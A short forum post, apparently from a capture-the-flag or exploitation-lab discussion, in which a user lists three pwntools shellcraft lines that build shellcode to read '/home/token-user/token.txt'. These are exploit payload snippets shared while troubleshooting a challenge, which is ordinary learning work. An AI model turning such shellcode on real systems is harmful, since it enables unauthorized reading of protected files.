Forum Discussion
kdkstudies
Bronze I
3 months agoAdditionally I've tried these as well.
shellcode = asm(shellcraft.cat("/home/token-user/token.txt"))
shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0)
shellcode = asm(shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0))